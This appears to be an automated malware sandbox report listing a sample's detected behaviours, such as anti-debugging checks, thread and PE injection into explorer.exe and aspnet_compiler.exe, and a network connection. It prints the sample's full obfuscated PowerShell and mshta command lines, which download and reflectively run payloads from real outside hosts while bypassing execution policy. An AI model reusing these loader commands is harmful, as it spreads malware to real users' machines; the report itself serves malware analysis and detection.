Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

System information queried: CodeIntegrityInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00402920 LdrLoadDll,

13_2_00402920

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 20_2_030416C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

20_2_030416C7

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02DC9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

17_2_02DC9247

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02D61011 GetProcessHeap,RtlFreeHeap,

17_2_02D61011

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\djvbaae

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: djvbaae.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 46.173.214.24 80

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_5568.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Creates a thread in another existing process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Thread created: C:\Windows\explorer.exe EIP: 3441960

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 4928 base: 9D79C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 796 base: 7FF72B812D10 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 7052 base: 9D79C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 7100 base: 9D79C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 3484 base: 7FF72B812D10 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 692 base: 9D79C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 5432 base: 7FF72B812D10 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 3588 base: 9D79C0 value: 90
Source: C:\Windows\explorer.exe	Memory written: PID: 2164 base: 7FF72B812D10 value: 90

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BB7008	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0

Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		27_2_02D51016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		27_2_02D510A5

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','\|').replace('sey','$')\| . ((gv 'mdr').name[3,11,2]-join'')"
